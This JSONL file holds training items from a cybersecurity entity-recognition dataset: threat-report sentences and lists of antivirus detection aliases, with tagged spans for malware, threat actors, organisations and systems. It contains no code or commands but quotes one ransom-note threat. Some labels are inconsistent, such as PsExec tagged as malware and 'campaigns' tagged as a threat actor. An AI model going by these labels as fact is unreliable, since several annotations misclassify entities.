{"text": "A backdoor also known as: TrojanAPT.Infostealer.H4 Win32.Trojan.WisdomEyes.16070401.9500.9983 Trojan.Win32.ke3chang.f TrojWare.Win32.PSW.Delf.~JHN Trojan.DownLoader9.45552 BehavesLike.Win32.BadFile.gz Trojan.Win32.ke3chang.f Trojan/Win32.Infostealer.R91040", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003411", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32/AutoRun.dqkk TROJ_SPNR.35CC13 Worm.Autorun-6695 Worm.Win32.AutoRun.eemt Trojan.Win32.Cromptui.bbwocj Worm.Win32.A.AutoRun.32768.Y[h] PE:Worm.VBInjectEx!1.99E6[F1] Trojan.DownLoader4.54145 TROJ_SPNR.35CC13 BehavesLike.Win32.Dropper.nm W32/Trojan.MOJM-1187 Worm/AutoRun.aboz TR/Spy.100048 Trojan.Heur.EF62DD Trojan/Win32.HDC TrojanDownloader:Win32/Kimiki.A Worm.AutoRun Win32.Worm.Autorun.Edef Trojan-Downloader.Win32.Kimiki Worm.Win32.AutoRun.eemt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003412", "source": "cyner2_train"}}
{"text": "In one case, the content of the email appeared to be a legitimate email conversation between several employees, even containing contact details of employees from several banks.", "spans": {}, "info": {"id": "cyner2_train_003413", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.QueryexXM.Worm HackTool.Wpakill HackTool.WpaKill W32/Risk.JBSX-2163 Trojan.ADH.2 Win.Trojan.Swrort-5988 Crack-WindowsWGA.a HackTool.Win32.Wpakill W32/MalwareF.XIWY Trojan/Win32.Buzus HackTool:MSIL/Wpakill.A Crack-WindowsWGA.a HackTool.Wpakill!EXR6p6S0Jr0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003415", "source": "cyner2_train"}}
{"text": "Xavier's impact has been widespread.", "spans": {}, "info": {"id": "cyner2_train_003417", "source": "cyner2_train"}}
{"text": "But I know your email for sure it's not that one.", "spans": {}, "info": {"id": "cyner2_train_003420", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Raleka.14880.C Worm.Raleka.e.n3 W32/Raleka.worm Worm.Raleka.Win32.17 W32/Raleka.worm Worm.Raleka!sd8qYJWRVVk W32/Raleka.E W32.HLLW.Raleka Raleka.E Win32/Raleka.D Net-Worm.Win32.Raleka.e Trojan.Win32.Raleka.enog Worm.Win32.Raleka.H BehavesLike.Win32.Downloader.lc W32/Raleka.RXXM-3755 Worm/Raleka.k Worm/Raleka.E.2 Worm[Net]/Win32.Raleka Worm.Raleka.e.kcloud Worm:Win32/Raleka.G Trojan/Win32.Downloader Worm.Raleka W32/Kelar.B Win32/Raleka.H Win32.Worm-net.Raleka.Egog Net-Worm.Win32.Raleka.e W32/Raleka.B!worm Worm/Raleka.D Worm.Win32.Raleka.aTW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003421", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Hoax.Win32.ArchSMS!O Trojan/ArchSMS.hqni TROJ_FAKEALERT_CD1031EC.RDXN Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32/Tnega.BTJDDdC TROJ_FAKEALERT_CD1031EC.RDXN Trojan.Win32.SMSSend.bddqwl Trojan.SMSSend.517 Tool.ArchSMS.Win32.277 Hoax.Win32.ArchSMS Hoax.ArchSMS.mn HackTool[Hoax]/Win32.ArchSMS Win32.Troj.Hoax.kcloud Trojan:Win32/Ninunarch.A Trojan/Win32.ArchSMS.R68018 Hoax.ArchSMS.hq Win32/Hoax.ArchSMS.JS Trojan.ArchSMS!V0Eag+i949w", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003422", "source": "cyner2_train"}}
{"text": "Spora got some hype of being a ransomware that can encrypt files offline.", "spans": {"MALWARE: Spora": [[0, 5]], "MALWARE: a ransomware": [[29, 41]]}, "info": {"id": "cyner2_train_003423", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan-Downloader.Win32.Sysdrop.lm Trojan.Win32.Sysdrop.esnrws Downloader.Sysdrop.Win32.33 TR/Zusy.ugkcf Trojan.Zusy.D3C19C Trojan-Downloader.Win32.Sysdrop.lm Downloader/Win32.Sysdrop.C2035975 TrojanDownloader.Sysdrop Trj/GdSda.A Trojan.DL.Sysdrop! Trojan-Downloader.Win32.Sysdrop", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003426", "source": "cyner2_train"}}
{"text": "Herein we release our analysis of a previously undocumented backdoor that has been targetedagainst embassies and consulates around the world leads us to attribute it, with high confidence,to the Turla group.", "spans": {"MALWARE: backdoor": [[60, 68]], "ORGANIZATION: embassies": [[99, 108]], "ORGANIZATION: consulates": [[113, 123]], "THREAT_ACTOR: the Turla group.": [[191, 207]]}, "info": {"id": "cyner2_train_003427", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Tiny.S40745 Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Tiny.elmbme MalCrypt.Indus! BehavesLike.Win32.Backdoor.zz TR/Tiny.lsfum Trojan.Zusy.D32039 Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003428", "source": "cyner2_train"}}
{"text": "Turla is a notorious group that has been targeting governments, government officials and diplomats for years.", "spans": {"THREAT_ACTOR: Turla": [[0, 5]], "THREAT_ACTOR: group": [[21, 26]], "ORGANIZATION: governments, government officials": [[51, 84]], "ORGANIZATION: diplomats": [[89, 98]]}, "info": {"id": "cyner2_train_003429", "source": "cyner2_train"}}
{"text": "TrendMicro first discovered MalumPoS, a new attack tool that threat actors can reconfigure to breach any PoS system they wish to target.", "spans": {"ORGANIZATION: TrendMicro": [[0, 10]], "MALWARE: MalumPoS,": [[28, 37]], "MALWARE: attack tool": [[44, 55]], "SYSTEM: PoS system": [[105, 115]]}, "info": {"id": "cyner2_train_003430", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Ransom.Win32.Seftad!O Trojan.Seftad Trojan.MBRlock.Win32.1 Trojan/Seftad.a Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Risk.HXYU-7341 Trojan.Bootlock Win32/RansomSeftad.A Trojan-Ransom.Win32.Seftad.a Trojan.Win32.Seftad.bsiwp Troj.Ransom.W32.Seftad.tn9Q Trojan.MBRlock.1 Trojan-Ransom.Win32.Seftad W32/MalwareF.RQPA Trojan/Seftad.a BOO/Seftad.A Trojan[Ransom]/Win32.Seftad Trojan:Win32/Seftad.A Trojan-Ransom.Win32.Seftad.a Trojan/Win32.Seftad.R111206 Trojan-Ransom.Seftad Win32/MBRlock.A Trojan.Seftad!+WmSfnLYKGo W32/Seftad.A!tr Trj/SeftadMBR.A.Crypt", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003431", "source": "cyner2_train"}}
{"text": "Unknown threats may evade signature-based detection, but can be blocked by other detection tools which identify malicious behavior.", "spans": {"MALWARE: Unknown threats": [[0, 15]], "MALWARE: malicious behavior.": [[112, 131]]}, "info": {"id": "cyner2_train_003432", "source": "cyner2_train"}}
{"text": "Regin is a multi-purpose data collection tool which dates back several years.", "spans": {"MALWARE: Regin": [[0, 5]]}, "info": {"id": "cyner2_train_003433", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.Clod4c3.Trojan.53a7 Win32.P2P.Mua.E@mm Win32.P2P.Mua.E@mm Worm.Mua.Win32.3 W32/Mua.e Worm.P2P.Mua!6PD7raLqpvw W32.HLLW.Mua Win32/Mua.B BKDR_BRABOT.B P2P-Worm.Win32.Mua.e Win32.P2P.Mua.E@mm Trojan.Win32.Mua.hfob Worm.Win32.A.P2P-Mua.15147 Win32.P2P.Mua.E@mm Win32.P2P.Mua.E@mm BKDR_BRABOT.B BehavesLike.Win32.Sality.lh W32/Risk.FPWU-1321 Worm[P2P]/Win32.Mua Worm.Mua.e.kcloud Worm:Win32/Mua.C Win32.P2P.Mua.E@mm Win32/Mua.worm.15152.C Worm.Mua Worm.Win32.Mua.AhDz Win32/Mua.E Win32.Worm-P2P.Mua.dopm P2P-Worm.Win32.Mua.c W32/Shower.L Worm/Mua.E Win32/Trojan.bfd", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003434", "source": "cyner2_train"}}
{"text": "I had found very few examples of non-targeted malspam using this RAT.", "spans": {"MALWARE: RAT.": [[65, 69]]}, "info": {"id": "cyner2_train_003435", "source": "cyner2_train"}}
{"text": "We recently spotted Neutrino being used to deliver a zero-detection Zeus variant and are sharing some brief indicators here.", "spans": {"MALWARE: Neutrino": [[20, 28]], "MALWARE: Zeus variant": [[68, 80]]}, "info": {"id": "cyner2_train_003437", "source": "cyner2_train"}}
{"text": "Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file.", "spans": {"MALWARE: Reaver": [[0, 6]], "MALWARE: final payload": [[52, 65]]}, "info": {"id": "cyner2_train_003438", "source": "cyner2_train"}}
{"text": "The Turla group is known to target government, military, technology, energy and commercial organisations.", "spans": {"THREAT_ACTOR: The Turla group": [[0, 15]], "ORGANIZATION: government, military, technology, energy": [[35, 75]], "ORGANIZATION: commercial organisations.": [[80, 105]]}, "info": {"id": "cyner2_train_003439", "source": "cyner2_train"}}
{"text": "This report aims to uncover at least some undertakings of that group and to connect different attacks across the globe.", "spans": {"THREAT_ACTOR: group": [[63, 68]]}, "info": {"id": "cyner2_train_003440", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Adware.RuKomaCRTD.Win32.4797 PUP.LoadMoney/Variant Trojan.Adware.Rukometa.Mikey.8 HT_RUKOMA_GA2700D5.UVPM HT_RUKOMA_GA2700D5.UVPM Trojan.Win32.Dwn.ehjpxo Trojan.DownLoader22.51269 Trojan.Scar.hqw Adware/Win32.Updater.C1575400 Adware.Zusy PUA.RuKoma! PUA.RuKoma", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003441", "source": "cyner2_train"}}
{"text": "In February 2016, Check Point researchers first discovered HummingBad, a malware that establishes a persistent rootkit on Android devices, generates fraudulent ad revenue, and installs additional fraudulent apps.", "spans": {"ORGANIZATION: Check Point researchers": [[18, 41]], "MALWARE: HummingBad,": [[59, 70]], "MALWARE: malware": [[73, 80]], "MALWARE: rootkit": [[111, 118]], "SYSTEM: Android devices,": [[122, 138]]}, "info": {"id": "cyner2_train_003442", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Winsecsrv Trojan.Winsecsrv.Win64.325 Trojan.Win64.Winsecsrv TR/Winsecsrv.imeno Trojan:Win64/Winsecsrv.B!bit Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003444", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Yakes.303104 Trojan.Win32.Yakes!O Ransom.Tobfy.S5080 Trojan.Yakes.Win32.7333 Trojan/Yakes.bitd Trojan.Symmi.D1319B Win32.Trojan.VB.kf Trojan.Ransomlock.K Ransom_TOBFY.SM Win.Trojan.Yakes-628 Trojan.Win32.Yakes.bitd Trojan.Win32.Yakes.cojazo TrojWare.Win32.Injector.XFR Ransom_TOBFY.SM BehavesLike.Win32.PWSZbot.dt Trojan/Yakes.kjh Trojan/Win32.Yakes Trojan.Win32.A.Yakes.303104.D Trojan.Win32.Yakes.bitd Trojan/Win32.VBKrypt.R40134 Trojan.Yakes Trojan.Injector Win32/VB.QMS Trojan.Win32.Tobfy W32/Injector.YWH!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003447", "source": "cyner2_train"}}
{"text": "The malicious attachment, which offered salacious spoilers and video clips, attempted to install a 9002 remote access Trojan RAT historically used by state-sponsored actors.", "spans": {"MALWARE: a 9002 remote access Trojan RAT": [[97, 128]], "THREAT_ACTOR: state-sponsored actors.": [[150, 173]]}, "info": {"id": "cyner2_train_003449", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Barys.DD949 Win32.Trojan.WisdomEyes.16070401.9500.9860 Trojan:Win32/Grenam.B!inf Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003450", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Malware.1 Trojan.Rootkit.GGA Backdoor:W32/PcClient.ALE BACKDOOR.Trojan Backdoor:Win32/Xinia.C Trojan.Rootkit.GGA RootKit.Win32.Undef.ru W32/Rootkit.A SHeur.CPFS", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003451", "source": "cyner2_train"}}
{"text": "Hancitor also known as Tordal and Chanitor and Ruckguv have reappeared in campaigns distributing Pony and Vawtrak with significant updates and increased functionality.", "spans": {"MALWARE: Hancitor": [[0, 8]], "MALWARE: Tordal": [[23, 29]], "MALWARE: Chanitor": [[34, 42]], "MALWARE: Ruckguv": [[47, 54]], "THREAT_ACTOR: campaigns": [[74, 83]], "MALWARE: Pony": [[97, 101]], "MALWARE: Vawtrak": [[106, 113]]}, "info": {"id": "cyner2_train_003452", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Flooder.MSN.Chiller.A Trojan/W32.Flooder.135168.E Trojan.Flooder.MSN.Chiller.A Tool.Chiller.Win32.1 Trojan.Flooder.MSN.Chiller.A Flooder.Chiller!cPnYwu6r4qI Win32/Flooder.MSN.Chiller.10 TROJ_MSN.CHILLER IM-Flooder.Win32.Chiller Trojan.Win32.Chiller.ddka IM-Flooder.W32.Chiller!c Trojan.Flooder.MSN.Chiller.A TrojWare.Win32.Flooder.MSN.10 Trojan.Flooder.MSN.Chiller.A FDOS.Children TROJ_MSN.CHILLER W32/Risk.BSWW-2789 Flooder.MSN.Chiller HackTool[Flooder]/Win32.Chiller Trojan.Flooder.MSN.Chiller.A IMFlooder.Chiller Flooder.MSN.Chiller IM-Flooder.Win32.Chiller Trojan.Flooder.MSN.Chiller.A Flooder.AZF Trojan.Win32.IMFlooder.aa Win32/Trojan.Flooder.cc8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003454", "source": "cyner2_train"}}
{"text": "A backdoor also known as: VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R VBA.Trojan.Obfuscated.at VBA/Obfuscated.P Doc.Macro.Obfuscation-6360615-0 VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R Trojan.Script.MLW.ehjqnz VB:Trojan.VBA.Downloader.R VB:Trojan.VBA.Downloader.R W97M/Downloader.bkw HEUR.VBA.Trojan.e TrojanDownloader:O97M/Shelmock.A!dha W97M/Downloader.bkw Trojan.VBA.Obfuscated heur.macro.powershell.x", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003455", "source": "cyner2_train"}}
{"text": "This relatively new technique makes it difficult to detect the malware—especially on behavior-based malware detection systems.", "spans": {"SYSTEM: behavior-based malware detection systems.": [[85, 126]]}, "info": {"id": "cyner2_train_003456", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Mehm.B Trojan/W32.CGIScan.333312 Aplicacion/CGIScan.40 Trojan.Mehm.B Trojan.Cgiscan!ODpuR5Z5bgo W32/HackTool.CNH Hacktool.Flooder Win.Trojan.Cgiscan not-a-virus:NetTool.Win32.CGIScan.40 Riskware.Win32.CGIScan.byaea NetTool.CGIScan.333312[h] Trojan.Mehm.B Trojan.Mehm.B Trojan.DownLoader.9414 Tool.CGIScan.Win32.1 W32/Tool.MGCU-4799 TR/Mehm.B W32/Cgiscan.A!tr Trojan.Mehm.B Win-Trojan/Mehm.333312 Trojan:Win32/Cgiscan.A Trojan.Mehm.B Hacktool.Win32.CGIScan.40 Win32.Trojan.Spnr.Wqmq not-a-virus:NetTool.Win32.CGIScan Trojan.Mehm.B HackTool/CgiScan.A Win32/Virus.NetTool.902", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003457", "source": "cyner2_train"}}
{"text": "We will refer to the gang behind the malware as TeleBots.", "spans": {"THREAT_ACTOR: gang": [[21, 25]], "MALWARE: malware": [[37, 44]], "THREAT_ACTOR: TeleBots.": [[48, 57]]}, "info": {"id": "cyner2_train_003458", "source": "cyner2_train"}}
{"text": "They then distribute the trojanized application using their own, Russian-language-targeted Android Application sites.", "spans": {"MALWARE: trojanized application": [[25, 47]]}, "info": {"id": "cyner2_train_003459", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanpws.Qqpass.20916 Trojan.Adware.Graftor.D9426 Win32.Trojan.WisdomEyes.16070401.9500.9999 Infostealer.Onlinegame TSPY_ONLINEG.JW Win.Spyware.28080-1 Trojan-GameThief.Win32.OnLineGames.akyyi Trojan.Win32.Nilage.bstxe Trojan.PWS.Gamania.8978 TSPY_ONLINEG.JW BehavesLike.Win32.RAHack.dc Trojan/PSW.OnLineGames.xyc Trojan[GameThief]/Win32.WOW.gic Trojan:Win32/Ordpea.A Trojan-GameThief.Win32.OnLineGames.akyyi MalwareScope.Trojan-PSW.Game.7 Trj/Lineage.HKT Trojan.Win32.OnlineGames.pjf Trojan.PWS.OnlineGames.GFA Trojan-GameThief.Win32.OnLineGames", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003460", "source": "cyner2_train"}}
{"text": "We observed several high-volume FormBook malware distribution campaigns primarily taking aim at Aerospace, Defense Contractor, and Manufacturing sectors within the U.S. and South Korea during the past few months.", "spans": {"MALWARE: FormBook malware": [[32, 48]], "THREAT_ACTOR: distribution campaigns": [[49, 71]], "ORGANIZATION: Aerospace, Defense Contractor,": [[96, 126]], "ORGANIZATION: Manufacturing sectors": [[131, 152]]}, "info": {"id": "cyner2_train_003461", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojanspy.Coinsteal TROJ_GE.0352184D Win32.Trojan.WisdomEyes.16070401.9500.9999 TROJ_GE.0352184D Trojan.MSIL.PSW TrojanSpy:MSIL/CoinSteal.B!bit Spyware/Win32.Quasar.C2001029 Trojan.FakeMS Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003463", "source": "cyner2_train"}}
{"text": "This post opens the lock up and takes a look inside.", "spans": {}, "info": {"id": "cyner2_train_003465", "source": "cyner2_train"}}
{"text": "With email subject lines such as, bank account record annual report and company database we believe that attackers are possibly targeting companies.", "spans": {"THREAT_ACTOR: attackers": [[105, 114]], "ORGANIZATION: companies.": [[138, 148]]}, "info": {"id": "cyner2_train_003466", "source": "cyner2_train"}}
{"text": "Gary Warners's blog also reported on this and similar campaigns, indicating that a well-known botnet, Kelihos, is responsible for distributing this spam.", "spans": {"ORGANIZATION: Gary Warners's blog": [[0, 19]], "THREAT_ACTOR: campaigns,": [[54, 64]], "MALWARE: botnet, Kelihos,": [[94, 110]]}, "info": {"id": "cyner2_train_003468", "source": "cyner2_train"}}
{"text": "However, not to be out done, APT attackers have also started leveraging the exploit in targeted spear phishing attacks as well.", "spans": {"THREAT_ACTOR: APT attackers": [[29, 42]], "MALWARE: exploit": [[76, 83]]}, "info": {"id": "cyner2_train_003469", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.1490 Trojan.Heur.RP.E99DCA WORM_FLYSTUDI.B Win32.Trojan.WisdomEyes.16070401.9500.9998 WORM_FLYSTUDI.B Win.Worm.FlyStudio-34 Trojan.MulDrop6.9267 Trojan.Black.Win32.8293 BehavesLike.Win32.Autorun.vc TrojanDropper.Flystud Win32.Trojan.Ecode.Wwel Trojan.Win32.FlyStudio", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003470", "source": "cyner2_train"}}
{"text": "n the past, we have seen such occurrences with Magecart threat actors for example in the breach of the Umbro website.", "spans": {"THREAT_ACTOR: Magecart threat actors": [[47, 69]]}, "info": {"id": "cyner2_train_003472", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Win32.Maesorn!O Trojan/Maesorn.g Backdoor.Graybird Win.Trojan.OnlineGames-1999 Trojan.Win32.Maesorn.innuf Trojan.Win32.A.Maesorn.563216[ASPack] Trojan.PWS.Panda.980 BehavesLike.Win32.MultiPlug.hc Trojan/Maesorn.a TR/Maesorn.psa Trojan/Win32.Unknown Trojan.Maesorn.1 Trojan:Win32/Maesorn.A Trojan/Win32.Maesorn.C288249 TScope.Malware-Cryptor.SB Win32.Trojan.Maesorn.Lmax Trojan.Maesorn!i+tWu8HStQI Win32/Trojan.227", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003474", "source": "cyner2_train"}}
{"text": "WE WILL UNLOCK THE MOBILE DEVICE AND DELETE ALL YOUR DATA FROM OUR SERVER ! TURNING OFF YOUR PHONE IS MEANINGLESS , ALL YOUR DATA IS ALREADY STORED ON OUR SERVERS ! WE STILL CAN SELLING IT FOR SPAM , FAKE , BANK CRIME etc… We collect and download all of your personal data .", "spans": {}, "info": {"id": "cyner2_train_003475", "source": "cyner2_train"}}
{"text": "Unlike most ransomware, SamSam is not launched via user focused attack vectors, such as phishing campaigns and exploit kits.", "spans": {"MALWARE: ransomware, SamSam": [[12, 30]], "VULNERABILITY: attack vectors,": [[64, 79]], "THREAT_ACTOR: phishing campaigns": [[88, 106]], "MALWARE: exploit kits.": [[111, 124]]}, "info": {"id": "cyner2_train_003478", "source": "cyner2_train"}}
{"text": "In April 2017, in collaboration with Clearsky, Palo Alto Networks Unit 42 published an article about our research into targeted attacks in the Middle East.", "spans": {"ORGANIZATION: Clearsky,": [[37, 46]], "ORGANIZATION: Palo Alto Networks Unit 42": [[47, 73]]}, "info": {"id": "cyner2_train_003480", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.85E5 Downloader.Small.Win32.16916 Trojan/Downloader.Small.eqn Win32.Trojan.WisdomEyes.16070401.9500.9998 Win32/Matcash.AQ TROJ_DLOADER.KGM Win.Downloader.12076-1 Trojan-Downloader.Win32.Small.eqn Trojan.Win32.Small.pnkq Trojan.Win32.Downloader.9806 TrojWare.Win32.TrojanDownloader.Small.AP Trojan.DownLoader.26881 TROJ_DLOADER.KGM BehavesLike.Win32.Backdoor.zh TrojanDownloader.Small.cgx Trojan[Downloader]/Win32.Small TrojanDownloader:Win32/Matcash.A Trojan/Win32.Downloader.R162197 Trj/Downloader.PNC Win32.Trojan-downloader.Small.Agut Trojan.DL.Small!SbF3EFAX1gY Trojan-Downloader.Win32.Small", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003481", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.3D2A Trojan.Razy.DF5C4 Win32.Trojan.WisdomEyes.16070401.9500.9773 not-a-virus:RiskTool.Win32.Gamehack.zae Trojan.PWS.Banker1.20175 Trojan.Win32.PSW W32/Trojan.WGYB-0329 RiskTool.Gamehack.iw TR/Taranis.2867 not-a-virus:RiskTool.Win32.Gamehack.zae MalwareScope.Trojan-PSW.Game.16 Riskware.Gamehack! Win32/Trojan.fe9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003483", "source": "cyner2_train"}}
{"text": "However, minimal code change to Ploutus-D would greatly expand its ATM vendor targets since Kalignite Platform runs on 40 different ATM vendors in 80 countries.", "spans": {"MALWARE: Ploutus-D": [[32, 41]], "ORGANIZATION: ATM vendor": [[67, 77]], "SYSTEM: Kalignite Platform": [[92, 110]], "SYSTEM: ATM vendors": [[132, 143]]}, "info": {"id": "cyner2_train_003484", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Troj.Dropper.Msil!c Trojan.Zusy.D3F4E2 Win32.Trojan.WisdomEyes.16070401.9500.9901 Trojan.Coinbitminer TROJ_COINMINER_HA220058.UVPM Trojan.DownLoader25.65376 Trojan.CoinMiner.Win32.6726 TROJ_COINMINER_HA220058.UVPM Trojan:MSIL/CoinMiner.KA!bit Trojan/Win32.Tiggre.R218036 Misc.Riskware.BitCoinMiner Trj/GdSda.A Trojan.MinerBot Win32/Trojan.Dropper.bc3", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003485", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanDownloader.Jiwerks.A8 Trojan/Downloader.Delf.quc Trojan.Graftor.D451A Trojan.Win32.Dwn.wpldc Win32.Worm.Qqshare.crbf TrojWare.Win32.TrojanDownloader.Delf.QUC Trojan.DownLoader6.2772 Trojan-Ransom.Win32.Foreign Trojan/Win32.Unknown TrojanDownloader:Win32/Jiwerks.C Trojan/Win32.Banload.R28382 Trojan.DL.Delf!amQyVfM1aVU", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003486", "source": "cyner2_train"}}
{"text": "During this time it has managed to avoid scrutiny by the security community.", "spans": {"ORGANIZATION: the security community.": [[53, 76]]}, "info": {"id": "cyner2_train_003488", "source": "cyner2_train"}}
{"text": "In separate isolated incidents,we also noticed the deployment of MajikPOS via PsExec, a command-line tool that can be used to remotely execute processes on other systems.", "spans": {"MALWARE: MajikPOS": [[65, 73]], "MALWARE: PsExec,": [[78, 85]], "MALWARE: command-line tool": [[88, 105]], "SYSTEM: systems.": [[162, 170]]}, "info": {"id": "cyner2_train_003489", "source": "cyner2_train"}}
{"text": "The attacks point to extensive knowledge of the targets' activities, and share infrastructure and tactics with campaigns previously linked to Iranian threat actors.", "spans": {"ORGANIZATION: targets' activities,": [[48, 68]], "SYSTEM: share infrastructure": [[73, 93]], "THREAT_ACTOR: campaigns": [[111, 120]], "THREAT_ACTOR: Iranian threat actors.": [[142, 164]]}, "info": {"id": "cyner2_train_003490", "source": "cyner2_train"}}
{"text": "We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software.", "spans": {"THREAT_ACTOR: team": [[22, 26]], "SYSTEM: CIMPLICITY software.": [[117, 137]]}, "info": {"id": "cyner2_train_003492", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Dynamer.FC.1842 W32/Msil.AOXS-4373 TSPY_HPCUBESTLR.SM Win.Packed.Confuser-6042561-0 not-a-virus:PSWTool.Win32.MessengerPass.n Trojan.Win32.Stealer.emdjaa Troj.W32.Jorik.Shakblades.lBRs Packed:MSIL/SmartIL.A Trojan.PWS.Stealer.13008 TSPY_HPCUBESTLR.SM BehavesLike.Win32.CryptDoma.fc HackTool.Win32.BrowserPassview W32/Msil.O TrojanSpy.MSIL.ewm Win32.Troj.Undef.kcloud Trj/CI.A Win32/Trojan.cb4", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003493", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.G.Door.C Backdoor/W32.GDoor.334848 Backdoor.G.Door.C BKDR_DOOR.LG W32/Backdoor2.DZPI Backdoor.Trojan BKDR_DOOR.LG Win.Trojan.GGDoor-4 Backdoor.G.Door.C Backdoor.Win32.G_Door.c Backdoor.G.Door.C Trojan.Win32.GDoor.beknpm Backdoor.Win32.G_Door.334848 Backdoor.W32.G_Door.c!c Backdoor.G.Door.C Backdoor.G.Door.C Trojan.MulDrop.141 BehavesLike.Win32.Trojan.fc Backdoor/G_Door.c Backdoor.Win32.G_Door.C W32/Backdoor.VMMA-7325 Backdoor/G_Door.c BDS/G_door.C.17 Trojan[Backdoor]/Win32.G_Door Backdoor:Win32/G_Door.C Backdoor.Win32.G_Door.c Backdoor.G.Door.C Backdoor.G_Door Bck/Ggdoor.I Win32/G_Door.C Win32.Backdoor.G_door.Svhk Backdoor.G_Door!JC6xcbYSKHg Win32/Backdoor.b76", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003494", "source": "cyner2_train"}}
{"text": "The original version of Nokoyawa ransomware was introduced in February 2022 and written in the C programming language.", "spans": {"MALWARE: Nokoyawa ransomware": [[24, 43]], "SYSTEM: the C programming language.": [[91, 118]]}, "info": {"id": "cyner2_train_003495", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.FU.EF8E10 Win32.Trojan.WisdomEyes.16070401.9500.9998 W32/Risk.CCTW-9250 Trojan.Win32.Jascript.cvmxnk Dropper.Jascript.Win32.59 Trojan-Ransom.Win32.Gimemo W32/MalwareF.OGBH TrojanDropper.Jascript.ao TR/Drop.Jascript.bbo Trojan:Win32/Thetatic.A Dropper/Win32.Xema.C95872 Win32.Trojan-dropper.Jascript.Syrq Trojan.DR.Jascript!LiiZWXoHPPQ W32/Jascript.BBO!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003497", "source": "cyner2_train"}}
